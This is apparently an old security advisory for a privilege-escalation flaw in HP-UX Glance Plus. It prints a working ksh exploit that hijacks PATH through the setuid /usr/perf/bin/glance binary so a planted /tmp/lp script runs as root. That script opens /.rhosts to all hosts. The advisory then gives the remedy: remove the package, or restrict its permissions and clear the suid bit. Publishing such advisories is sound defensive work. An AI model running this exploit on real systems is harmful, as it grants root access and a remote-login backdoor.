COMMAND

    /usr/perf/bin/glance

SYSTEMS AFFECTED

    HP 9000/700

PROBLEM

        #!/bin/ksh
        # the other .traz

        GLANCE=/usr/perf/bin/glance

        # Put any commands you want into /tmp/lp, and they'll be run as root, basically
        cat > /tmp/lp << EOF
        #!/bin/ksh
        echo '+ +' >> /.rhosts
        chmod 666 /.rhosts
        EOF

        echo "Please wait about 10 or 15 seconds for your commands to run"
        chmod 777 /tmp/lp
        PATH=/tmp:$PATH
        export PATH
        ${GLANCE} -j 1 -p bob -iterations 1 -maxpages 1 > /dev/null 2>&1
        rm /tmp/lp

SOLUTION

    Glance Plus  is a  performance monitor  that is  included in  most
    HP-UX system installations as a  demo package or can be  purchased
    separately.  If  you  do  not   need  to  do  system   performance
    monitoring, you  should remove  this whole  package which includes
    all the  files in  /usr/perf. An  earlier problem  with Glance was
    covered in  the HP  Security Advisory  9405-011 which  describes a
    patch that updates Glance to version B.09.01 (700-800) or  A.09.07
    (300,  400).   The  current  vulnerability  is  not fixed by these
    updates.  If you need to keep this package, you should change  the
    permissions of  all the  files in  /usr/perf to  owner only access
    and clear the suid  bit. Check that the  files are owned by  root.
    Normal users will no  longer be able to  use this program but  the
    system manager will be able to do so when logged in as root.